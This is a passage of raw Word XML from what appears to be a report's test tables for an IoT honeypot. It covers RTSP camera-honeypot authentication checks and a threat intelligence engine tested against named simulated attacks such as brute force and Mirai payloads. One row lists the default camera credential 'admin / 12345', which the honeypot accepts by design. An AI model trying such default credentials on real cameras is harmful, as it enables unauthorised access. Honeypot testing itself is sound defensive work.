        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="974" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">RTSP Honeypot (CCTV Camera)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1466" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Verify DESCRIBE without credentials is challenged</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1396" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Stack running</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1575" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">DESCRIBE without Authorization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1114" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">401 with Digest and Basic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">RTSP/1.0 401 Unauthorized + 2 WWW-Authenticate headers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="758" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="466DC6E6" w14:textId="77777777" w:rsidTr="005C6601">
        <w:trPr>
          <w:trHeight w:val="877"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">HB-RTSP-004</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="974" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">RTSP Honeypot (CCTV Camera)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1466" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Verify a default credential returns a valid SDP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1396" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Stack running</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1575" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">DESCRIBE with Basic auth</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1114" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">admin / 12345</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">200 with H.264 SDP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">RTSP/1.0 200 OK; a=rtpmap:96 H264/90000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="758" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1CF48B6F" w14:textId="54F0A1AE" w:rsidR="003272AD" w:rsidRPr="005C6601" w:rsidRDefault="005C6601" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="9042" w:name="_Toc69042"/>
      <w:r>
        <w:t xml:space="preserve">8.2 Functional Testing</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9042"/>
    </w:p>
    <w:p w14:paraId="589378CE" w14:textId="7E0FB37B" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Functional testing verifies complete end-to-end features. For the Threat Intelligence Engine, six simulated attackers ran all ten scenarios of tests/simulate_attacks.py (scan, brute force, credential stuffing, Mirai payload, discovery, MQTT C2, web scan, ICS control, camera, benign). The run produced 264 sessions and 1,275 events across all five protocols, and the engine raised 15 different detection types.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F37E5F8" w14:textId="77777777" w:rsidR="002C2A3E" w:rsidRPr="006428C0" w:rsidRDefault="002C2A3E" w:rsidP="002C2A3E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="9043" w:name="_Toc69043"/>
      <w:r>
        <w:t xml:space="preserve">Threat Intelligence Engine</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9043"/>
    </w:p>
    <w:p w14:paraId="589378CE" w14:textId="7E0FB37B" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tests the Threat Intelligence Engine (rules, MITRE ATT&amp;CK tagging, correlation, GeoIP and IOCs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7608910A" w14:textId="32DFBA61" w:rsidR="00F0564A" w:rsidRDefault="00F0564A" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Table \* ARABIC ">
        <w:r>
          <w:t xml:space="preserve">20</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: Threat Intelligence Engine Test Cases</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="margin" w:tblpXSpec="center" w:tblpYSpec="inside"/>
        <w:tblW w:w="11146" w:type="dxa"/>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CellMar>
          <w:left w:w="10" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="641"/>
        <w:gridCol w:w="974"/>
        <w:gridCol w:w="1466"/>
        <w:gridCol w:w="1396"/>
        <w:gridCol w:w="1575"/>
        <w:gridCol w:w="1114"/>
        <w:gridCol w:w="1513"/>
        <w:gridCol w:w="1709"/>
        <w:gridCol w:w="758"/>
      </w:tblGrid>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="39D0FE0D" w14:textId="77777777" w:rsidTr="005C6601">
        <w:trPr>
          <w:trHeight w:val="518"/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Test Case ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="974" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Module</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1466" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1396" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Preconditions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1575" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1114" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Input</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Expected Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Actual Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="758" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="466DC6E6" w14:textId="77777777" w:rsidTr="005C6601">
        <w:trPr>
          <w:trHeight w:val="877"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">HB-DET-001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="974" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Intel Engine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1466" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Verify brute force and credential attacks are detected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1396" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Simulator run completed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1575" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Run detection pass (POST /api/detect)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1114" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
